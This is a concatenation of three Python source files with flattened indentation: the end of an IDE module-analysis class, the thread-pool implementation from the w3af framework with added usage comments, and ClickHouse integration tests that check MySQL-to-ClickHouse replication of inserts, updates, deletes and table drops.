def GetModuleDoc(self,module_name):
module = self.GetModule(module_name)
if module is None:
return None
return module.GetDoc()
def GetModuleMemberArgmentTip(self,module_name,child_name):
module = self.GetModule(module_name)
if module is None:
return None
scopes = module.FindDefinitionWithName(child_name)
if not scopes:
return ''
return scopes[0].GetArgTip()
def AddUnfinishModuleFile(self,module_file):
'''
Add a module that needs to be analysed again to the unfinish list
'''
interpreter = GetApp().GetCurrentInterpreter()
if not interpreter.Path in self.unfinish_files:
self.unfinish_files[interpreter.Path] = set([module_file])
else:
self.unfinish_files[interpreter.Path].add(module_file)
def WriteUnfinishFiles(self):
'''
Save the unfinish list so that the next run of run.py will force these modules to be re-analysed and the database to be regenerated
'''
if len(self.unfinish_files) > 0:
unfinished_file_name = "unfinish.txt"
for interpreter_path in self.unfinish_files:
interpreter = interpretermanager.InterpreterManager().GetInterpreterByPath(interpreter_path)
database_path = self.GetInterpreterDatabasePath(interpreter)
unfinished_file_path = os.path.join(database_path,unfinished_file_name)
with open(unfinished_file_path,"w") as f:
unfinish_file_paths = list(self.unfinish_files[interpreter_path])
for path in unfinish_file_paths:
f.write(path + "\n")
|
threadpool.py
|
"""
threadpool.py
Copyright 2006 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import sys
import time
import Queue
import threading
import traceback
from functools import partial
from multiprocessing.dummy import Process, current_process
from multiprocessing.util import Finalize, debug
from multiprocessing import cpu_count
from .pool276 import ThreadPool, RUN, create_detailed_pickling_error, mapstar
from w3af.core.data.fuzzer.utils import rand_alnum
from w3af.core.controllers.threads.decorators import apply_with_return_error
__all__ = ['Pool', 'return_args', 'one_to_many']
class one_to_many(object):
"""
This is a simple wrapper that translates one argument to many in a function
call. Useful for passing to the threadpool map function.
"""
def __init__(self, func):
self.func_orig = func
# Similar to functools wraps
self.__name__ = func.__name__
self.__doc__ = func.__doc__
def __call__(self, args):
return self.func_orig(*args)
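# Hedged usage sketch (not part of the original w3af source): one_to_many lets
# Pool.map() style APIs call a multi-argument function with a single tuple.
#
#   def add(a, b):
#       return a + b
#
#   wrapped = one_to_many(add)
#   assert wrapped((2, 3)) == 5    # the tuple is unpacked into add(2, 3)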
class return_args(object):
"""
Utility wrapper that returns the call arguments together with the result,
useful when calling functions like imap_unordered().
"""
def __init__(self, func, *args, **kwds):
self.func = partial(func, *args, **kwds)
# Similar to functools wraps
self.func_orig = func
self.__name__ = func.__name__
self.__doc__ = func.__doc__
def __call__(self, *args, **kwds):
return args, self.func(*args, **kwds)
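# Hedged usage sketch (not part of the original w3af source): return_args keeps
# the call arguments next to the result, which is handy with imap_unordered()
# because results arrive out of order.
#
#   def square(x):
#       return x * x
#
#   wrapped = return_args(square)
#   assert wrapped(3) == ((3,), 9)   # (args, result)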
class DaemonProcess(Process):
def __init__(self, group=None, target=None, name=None, args=(), kwargs={}):
super(DaemonProcess, self).__init__(group, target, name, args, kwargs)
self.daemon = True
self.worker = target
self.name = name
def get_state(self):
state = self.worker.get_state()
state['name'] = self.name
return state
def is_idle(self):
return self.worker.is_idle()
def start(self):
"""
There is a race condition in DaemonProcess.start() which was found
during some of the test scans I run. The race condition exists
because we're using Threads for a Pool that was designed to be
used with real processes: thus there is no worker.exitcode,
thus it has to be simulated in a race condition-prone way.
I'm overriding this method in order to move this line:
self._start_called = True
Closer to the call to .start(), which should reduce the chances
of triggering the race conditions by 1% ;-)
"""
assert self._parent is current_process()
if hasattr(self._parent, '_children'):
self._parent._children[self] = None
self._start_called = True
threading.Thread.start(self)
def add_traceback_string(_exception):
"""
Add the traceback string as a new attribute to the exception raised
by the target function defined by the developer.
Adding this original traceback allows us to better understand the
root cause for exceptions that happen in functions which are run inside
the Pool (most).
For example, this is an exception stored in a /tmp/w3af-crash file before
this patch:
A "TypeError" exception was found while running crawl.phpinfo on "Method: GET | http://domain/".
The exception was: "unsupported operand type(s) for -: 'float' and 'NoneType'" at pool276.py:get():643.
The full traceback is:
File "/home/user/tools/w3af/w3af/core/controllers/core_helpers/consumers/crawl_infrastructure.py", line 533, in _discover_worker
result = plugin.discover_wrapper(fuzzable_request)
File "/home/user/tools/w3af/w3af/core/controllers/plugins/crawl_plugin.py", line 53, in crawl_wrapper
return self.crawl(fuzzable_request_copy)
File "/home/user/tools/w3af/w3af/plugins/crawl/phpinfo.py", line 148, in crawl
self.worker_pool.map_multi_args(self._check_and_analyze, args)
File "/home/user/tools/w3af/w3af/core/controllers/threads/threadpool.py", line 430, in map_multi_args
return self.map_async(one_to_many(func), iterable, chunksize).get()
File "/home/user/tools/w3af/w3af/core/controllers/threads/pool276.py", line 643, in get
raise self._value
And after adding the original traceback and using it in exception_handler.py:
A "TypeError" exception was found while running crawl.phpinfo on "Method: GET | http://domain/".
The exception was: "unsupported operand type(s) for -: 'float' and 'NoneType'" at pool276.py:get():643.
The full traceback is:
Traceback (most recent call last):
File "/home/user/tools/w3af/w3af/core/controllers/threads/threadpool.py", line 238, in __call__
result = (True, func(*args, **kwds))
File "/home/user/tools/w3af/w3af/core/controllers/threads/pool276.py", line 67, in mapstar
return map(*args)
File "/home/user/tools/w3af/w3af/core/controllers/threads/threadpool.py", line 55, in __call__
return self.func_orig(*args)
File "/home/user/tools/w3af/w3af/plugins/crawl/phpinfo.py", line 180, in _check_and_analyze
1.0 - None
TypeError: unsupported operand type(s) for -: 'float' and 'NoneType'
The exact line where the exception is raised is shown!
Adding new attributes to instances is not something I like, but in
this case I had no choice...
Creating a new Exception type and wrapping all exceptions generated
by the pool with that one wouldn't work: we lose the exception type
and can't do:
try:
...
except TypeError:
...
The code for the whole framework would need to be changed to something
like:
try:
...
except PoolException, pe:
if isinstance(pe.original_exception, TypeError):
...
:param _exception: The exception instance where to add the new attribute
:return: None
"""
except_type, except_class, tb = sys.exc_info()
tb = traceback.format_exception(type(_exception), _exception, tb)
_exception.original_traceback_string = ''.join(tb)
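# Hedged usage sketch (illustrative, not part of the original module): the helper
# is meant to be called from an "except" block, where sys.exc_info() still holds
# the traceback of the exception being handled.
#
#   try:
#       1.0 - None
#   except Exception, e:                    # Python 2 syntax, as in this module
#       add_traceback_string(e)
#       print(e.original_traceback_string)  # full formatted traceback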
class Worker(object):
__slots__ = ('func', 'args', 'kwargs', 'start_time', 'job', 'id')
def __init__(self):
self.func = None
self.args = None
self.kwargs = None
self.start_time = None
self.job = None
self.id = rand_alnum(8)
def is_idle(self):
return self.func is None
def get_real_func_name(self):
"""
Because of various levels of abstraction the function name is not always in
self.func.__name__, this method "unwraps" the abstractions and shows us
something easier to digest.
:return: The function name
"""
if self.func is None:
return None
if self.func is mapstar:
self.func = self.args[0][0]
self.args = self.args[0][1:]
if self.func is apply_with_return_error:
self.func = self.args[0][0]
self.args = self.args[0][1:]
if isinstance(self.func, return_args):
return self.func.func_orig.__name__
if isinstance(self.func, one_to_many):
return self.func.func_orig.__name__
return self.func.__name__
def get_state(self):
func_name = self.get_real_func_name()
return {'func_name': func_name,
'args': self.args,
'kwargs': self.kwargs,
'start_time': self.start_time,
'idle': self.is_idle(),
'job': self.job,
'worker_id': self.id}
def __call__(self, inqueue, outqueue, initializer=None, initargs=(), maxtasks=None):
assert maxtasks is None or (type(maxtasks) in (int, long) and maxtasks > 0)
put = outqueue.put
get = inqueue.get
if hasattr(inqueue, '_writer'):
inqueue._writer.close()
outqueue._reader.close()
if initializer is not None:
initializer(*initargs)
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
try:
task = get()
except (EOFError, IOError):
debug('worker got EOFError or IOError -- exiting')
break
if task is None:
debug('worker got sentinel -- exiting')
break
job, i, func, args, kwds = task
# Tracking
self.func = func
self.args = args
self.kwargs = kwds
self.start_time = time.time()
self.job = job
try:
result = (True, func(*args, **kwds))
except Exception, e:
add_traceback_string(e)
result = (False, e)
# Tracking
self.func = None
self.args = None
self.kwargs = None
self.start_time = None
self.job = None
try:
put((job, i, result))
except Exception as e:
wrapped = create_detailed_pickling_error(e, result[1])
put((job, i, (False, wrapped)))
finally:
# https://bugs.python.org/issue29861
task = None
job = None
result = None
func = None
args = None
kwds = None
completed += 1
debug('worker exiting after %d tasks' % completed)
class Pool(ThreadPool):
def __init__(self, processes=None, initializer=None, initargs=(),
worker_names=None, maxtasksperchild=None,
max_queued_tasks=0):
"""
Overriding this method in order to:
* Name the pool worker threads
* Name the threads used for managing the Pool internals
"""
self.Process = partial(DaemonProcess, name=worker_names)
self.worker_names = worker_names
# Setting the max number of queued tasks for the ThreadPool is not
# as simple as it looks.
#
# First I tried to limit the max size of self._inqueue (defined
# in _setup_queues), that didn't work.
#
# Then I tried to limit the size for self._taskqueue, that didn't
# work either.
#
# I had to set the maxsize of self._taskqueue to 1 and use the
# max_queued_tasks parameter to limit the size of self._inqueue
# This is required due to the ThreadPool internals, see the
# definition of the _handle_tasks method in pool276.py where
# the function is reading from self._taskqueue and writing to
# self._inqueue.
#
# Not setting the limit in self._taskqueue allows the main thread
# to enqueue an infinite number of tasks.
#
# Only setting the limit in self._taskqueue will not work, since
# the _handle_tasks method is always reading from that queue
# (which decreases its size) and writing to self._inqueue. Because
# of those reads to self._taskqueue, the queue never reaches the
# limit.
#
if max_queued_tasks != 0:
assert max_queued_tasks - 1 > 0, 'max_queued_tasks needs to be at least 2'
self._setup_queues(max_queued_tasks - 1)
self._taskqueue = Queue.Queue(maxsize=1)
self._cache = {}
self._state = RUN
self._maxtasksperchild = maxtasksperchild
self._initializer = initializer
self._initargs = initargs
if processes is None:
try:
processes = cpu_count()
except NotImplementedError:
processes = 1
if processes < 1:
raise ValueError("Number of processes must be at least 1")
if initializer is not None and not hasattr(initializer, '__call__'):
raise TypeError('initializer must be a callable')
self._processes = processes
self._pool = []
self._repopulate_pool()
self._worker_handler = threading.Thread(
target=Pool._handle_workers,
args=(self, ),
name='PoolWorkerHandler')
self._worker_handler.daemon = True
self._worker_handler._state = RUN
self._worker_handler.start()
self._task_handler = threading.Thread(
target=Pool._handle_tasks,
args=(self._taskqueue, self._quick_put, self._outqueue,
self._pool, self._cache),
name='PoolTaskHandler')
self._task_handler.daemon = True
self._task_handler._state = RUN
self._task_handler.start()
self._result_handler = threading.Thread(
target=Pool._handle_results,
args=(self._outqueue, self._quick_get, self._cache),
name='PoolResultHandler')
self._result_handler.daemon = True
self._result_handler._state = RUN
self._result_handler.start()
self._terminate = Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue, self._pool,
self._worker_handler, self._task_handler,
self._result_handler, self._cache),
exitpriority=15)
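# Hedged usage sketch (not part of the original w3af source), assuming a caller
# supplies its own worker function such as "fetch_url": named workers plus a
# bounded task queue so producers block instead of building an unbounded backlog.
#
#   pool = Pool(processes=10,
#               worker_names='WorkerThread',
#               maxtasksperchild=20,
#               max_queued_tasks=50)    # 1 slot in _taskqueue + 49 in _inqueue
#   # ... pool.map(fetch_url, urls) ...
#   pool.terminate_join()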
def get_inqueue(self):
return self._inqueue
def get_running_task_count(self):
# Cheating here a little bit because the task queued in _inqueue will
# eventually be run by the pool, but is not yet in the pool
running_tasks = self._inqueue.qsize()
for process in self._pool[:]:
if not process.is_idle():
running_tasks += 1
return running_tasks
def _repopulate_pool(self):
"""
Bring the number of pool processes up to the specified number,
for use after reaping workers which have exited.
I overwrite this in order to change the Process target to a Worker
object (instead of a function) in order to keep better stats of
what it is doing.
"""
for i in range(self._processes - len(self._pool)):
w = self.Process(target=Worker(),
args=(self._inqueue, self._outqueue,
self._initializer,
self._initargs, self._maxtasksperchild)
)
self._pool.append(w)
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.start()
debug('added worker')
def get_worker_count(self):
return len(self._pool)
def set_worker_count(self, count):
"""
Set the number of workers.
Keep in mind that the change is not immediate when decreasing
the pool process count!
* When increasing the size, the threadpool will call
repopulate_pool() and the new threads will be created
* When decreasing the size, a thread will finish because
of maxtasksperchild, then repopulate_pool() will be
called async and the thread will *not* be created,
thus decreasing the pool size
The change is made effective depending on the work load and
the time required to finish each task.
:param count: The new process count
:return: None
"""
assert self._maxtasksperchild, 'Can only adjust size if maxtasksperchild is set'
assert count >= 1, 'Number of processes must be at least 1'
self._processes = count
self._repopulate_pool()
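# Hedged usage sketch (illustrative only): growing the pool takes effect on the
# next _repopulate_pool() call, while shrinking only happens as workers retire
# via maxtasksperchild.
#
#   pool = Pool(processes=5, maxtasksperchild=10)
#   pool.set_worker_count(10)   # new threads created right away
#   pool.set_worker_count(2)    # drains gradually as workers hit maxtasksperchild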
def _setup_queues(self, max_queued_tasks):
self._inqueue = Queue.Queue(maxsize=max_queued_tasks)
self._outqueue = Queue.Queue()
self._quick_put = self._inqueue.put
self._quick_get = self._outqueue.get
def map_multi_args(self, func, iterable, chunksize=None):
"""
Blocks until all results are done (please note the .get())
"""
assert self._state == RUN
return self.map_async(one_to_many(func), iterable, chunksize).get()
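# Hedged usage sketch (not part of the original w3af source): each item of the
# iterable is an argument tuple that one_to_many unpacks for the target function.
#
#   def check(url, timeout):
#       return url, timeout
#
#   pool.map_multi_args(check, [('http://a/', 5), ('http://b/', 10)])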
def in_qsize(self):
return self._taskqueue.qsize()
def is_running(self):
return self._state == RUN
def terminate_join(self):
self.terminate()
self.join()
def _join_exited_workers(self):
"""Cleanup after any worker processes which have exited due to reaching
their specified lifetime. Returns True if any workers were cleaned up.
"""
cleaned = False
for i in reversed(range(len(self._pool))):
worker = self._pool[i]
if worker.exitcode is not None:
# worker exited
try:
worker.join()
except RuntimeError:
#
# RuntimeError: cannot join thread before it is started
#
# This is a race condition in DaemonProcess.start() which was found
# during some of the test scans I run. The race condition exists
# because we're using Threads for a Pool that was designed to be
# used with real processes: thus there is no worker.exitcode,
# thus it has to be simulated in a race condition-prone way.
#
continue
else:
debug('cleaning up worker %d' % i)
cleaned = True
del self._pool[i]
return cleaned
def finish(self, timeout=120):
"""
Wait until all tasks in the self._inqueue have been processed (the queue
has size == 0) and then call terminate on the Pool.
I know this is not the best way of doing it, but had some dead-lock
issues with:
self.close()
self.join()
:param timeout: Wait up to timeout seconds for the queues to be empty
"""
delay = 0.1
for _ in xrange(int(timeout / delay)):
if (self._inqueue.qsize() == 0 and
self._outqueue.qsize() == 0 and
self._taskqueue.qsize() == 0):
break
time.sleep(delay)
self.terminate()
self.join()
def inspect_threads(self):
"""
This method inspects the attributes exposed by the Worker object defined
above and lets us debug the thread pool.
This is useful for answering the question: "What functions are running in
the pool right now?"
:return: Data as a list of dicts, which is usually sent to inspect_data_to_log()
"""
inspect_data = []
for process in self._pool[:]:
worker_state = process.get_state()
inspect_data.append(worker_state)
return inspect_data
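# Hedged sketch (illustrative only) of the per-worker state returned by
# inspect_threads(), as built in Worker.get_state() / DaemonProcess.get_state():
#
#   [{'name': 'PoolWorker-1', 'worker_id': 'a1b2c3d4', 'func_name': 'check',
#     'args': (...), 'kwargs': {...}, 'start_time': 1234567890.0,
#     'idle': False, 'job': 42},
#    ...]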
|
materialize_with_ddl.py
|
import time
import pymysql.cursors
import pytest
from helpers.network import PartitionManager
import logging
from helpers.client import QueryRuntimeException
from helpers.cluster import get_docker_compose_path, run_and_check
import random
import threading
from multiprocessing.dummy import Pool
from helpers.test_tools import assert_eq_with_retry
def check_query(clickhouse_node, query, result_set, retry_count=10, interval_seconds=3):
latest_result = ''
for i in range(retry_count):
try:
latest_result = clickhouse_node.query(query)
if result_set == latest_result:
return
logging.debug(f"latest_result {lastest_result}")
time.sleep(interval_seconds)
except Exception as e:
logging.debug(f"check_query retry {i+1} exception {e}")
time.sleep(interval_seconds)
else:
assert clickhouse_node.query(query) == result_set
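# Hedged usage sketch (not part of the original test module): check_query polls
# until the replicated result matches, which absorbs MaterializedMySQL's
# asynchronous replication lag.
#
#   check_query(clickhouse_node,
#               "SELECT count() FROM db.t FORMAT TSV",
#               "3\n",
#               retry_count=10, interval_seconds=3)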
def dml_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_dml")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_dml")
mysql_node.query("CREATE DATABASE test_database_dml DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database_dml.test_table_1 ("
"`key` INT NOT NULL PRIMARY KEY, "
"unsigned_tiny_int TINYINT UNSIGNED, tiny_int TINYINT, "
"unsigned_small_int SMALLINT UNSIGNED, small_int SMALLINT, "
"unsigned_medium_int MEDIUMINT UNSIGNED, medium_int MEDIUMINT, "
"unsigned_int INT UNSIGNED, _int INT, "
"unsigned_integer INTEGER UNSIGNED, _integer INTEGER, "
"unsigned_bigint BIGINT UNSIGNED, _bigint BIGINT, "
"/* Need ClickHouse support read mysql decimal unsigned_decimal DECIMAL(19, 10) UNSIGNED, _decimal DECIMAL(19, 10), */"
"unsigned_float FLOAT UNSIGNED, _float FLOAT, "
"unsigned_double DOUBLE UNSIGNED, _double DOUBLE, "
"_varchar VARCHAR(10), _char CHAR(10), binary_col BINARY(8), "
"/* Need ClickHouse support Enum('a', 'b', 'v') _enum ENUM('a', 'b', 'c'), */"
"_date Date, _datetime DateTime, _timestamp TIMESTAMP, _bool BOOLEAN) ENGINE = InnoDB;")
# it already has some data
mysql_node.query("""
INSERT INTO test_database_dml.test_table_1 VALUES(1, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', true);
""")
clickhouse_node.query(
"CREATE DATABASE test_database_dml ENGINE = MaterializeMySQL('{}:3306', 'test_database_dml', 'root', 'clickhouse')".format(
service_name))
assert "test_database_dml" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n")
mysql_node.query("""
INSERT INTO test_database_dml.test_table_1 VALUES(2, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', false);
""")
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t2020-01-01 00:00:00\t0\n")
mysql_node.query("UPDATE test_database_dml.test_table_1 SET unsigned_tiny_int = 2 WHERE `key` = 1")
check_query(clickhouse_node, """
SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,
small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer,
unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col,
_date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */
_bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV
""",
"1\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n")
# update primary key
mysql_node.query("UPDATE test_database_dml.test_table_1 SET `key` = 3 WHERE `unsigned_tiny_int` = 2")
check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
" small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
" unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
" _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
" _bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n3\t2\t-1\t2\t-2\t3\t-3\t"
"4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t1\n")
mysql_node.query('DELETE FROM test_database_dml.test_table_1 WHERE `key` = 2')
check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
" small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
" unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
" _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
" _bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"3\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t1\n")
mysql_node.query('DELETE FROM test_database_dml.test_table_1 WHERE `unsigned_tiny_int` = 2')
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV", "")
clickhouse_node.query("DROP DATABASE test_database_dml")
mysql_node.query("DROP DATABASE test_database_dml")
def materialized_mysql_database_with_views(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database.test_table_1 ("
"`key` INT NOT NULL PRIMARY KEY, "
"unsigned_tiny_int TINYINT UNSIGNED, tiny_int TINYINT, "
"unsigned_small_int SMALLINT UNSIGNED, small_int SMALLINT, "
"unsigned_medium_int MEDIUMINT UNSIGNED, medium_int MEDIUMINT, "
"unsigned_int INT UNSIGNED, _int INT, "
"unsigned_integer INTEGER UNSIGNED, _integer INTEGER, "
"unsigned_bigint BIGINT UNSIGNED, _bigint BIGINT, "
"/* Need ClickHouse support read mysql decimal unsigned_decimal DECIMAL(19, 10) UNSIGNED, _decimal DECIMAL(19, 10), */"
"unsigned_float FLOAT UNSIGNED, _float FLOAT, "
"unsigned_double DOUBLE UNSIGNED, _double DOUBLE, "
"_varchar VARCHAR(10), _char CHAR(10), binary_col BINARY(8), "
"/* Need ClickHouse support Enum('a', 'b', 'v') _enum ENUM('a', 'b', 'c'), */"
"_date Date, _datetime DateTime, _timestamp TIMESTAMP, _bool BOOLEAN) ENGINE = InnoDB;")
mysql_node.query("CREATE VIEW test_database.test_table_1_view AS SELECT SUM(tiny_int) FROM test_database.test_table_1 GROUP BY _date;")
# it already has some data
mysql_node.query("""
INSERT INTO test_database.test_table_1 VALUES(1, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', true);
""")
clickhouse_node.query(
"CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
service_name))
assert "test_database" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\n")
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def materialized_mysql_database_with_datetime_and_decimal(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_dt")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_dt")
mysql_node.query("CREATE DATABASE test_database_dt DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_dt.test_table_1 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
clickhouse_node.query("CREATE DATABASE test_database_dt ENGINE = MaterializedMySQL('{}:3306', 'test_database_dt', 'root', 'clickhouse')".format(service_name))
assert "test_database_dt" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_dt.test_table_1 ORDER BY key FORMAT TSV",
"1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
"2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
"3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
"4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
mysql_node.query("CREATE TABLE test_database_dt.test_table_2 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
check_query(clickhouse_node, "SELECT * FROM test_database_dt.test_table_2 ORDER BY key FORMAT TSV",
"1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
"2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
"3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
"4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
clickhouse_node.query("DROP DATABASE test_database_dt")
mysql_node.query("DROP DATABASE test_database_dt")
def drop_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_drop")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_drop")
mysql_node.query("CREATE DATABASE test_database_drop DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_drop.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("DROP TABLE test_database_drop.test_table_1;")
mysql_node.query("CREATE TABLE test_database_drop.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("TRUNCATE TABLE test_database_drop.test_table_2;")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_drop ENGINE = MaterializedMySQL('{}:3306', 'test_database_drop', 'root', 'clickhouse')".format(
service_name))
assert "test_database_drop" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV", "")
mysql_node.query("INSERT INTO test_database_drop.test_table_2 VALUES(1), (2), (3), (4), (5), (6)")
mysql_node.query("CREATE TABLE test_database_drop.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_drop FORMAT TSV", "test_table_1\ntest_table_2\n")
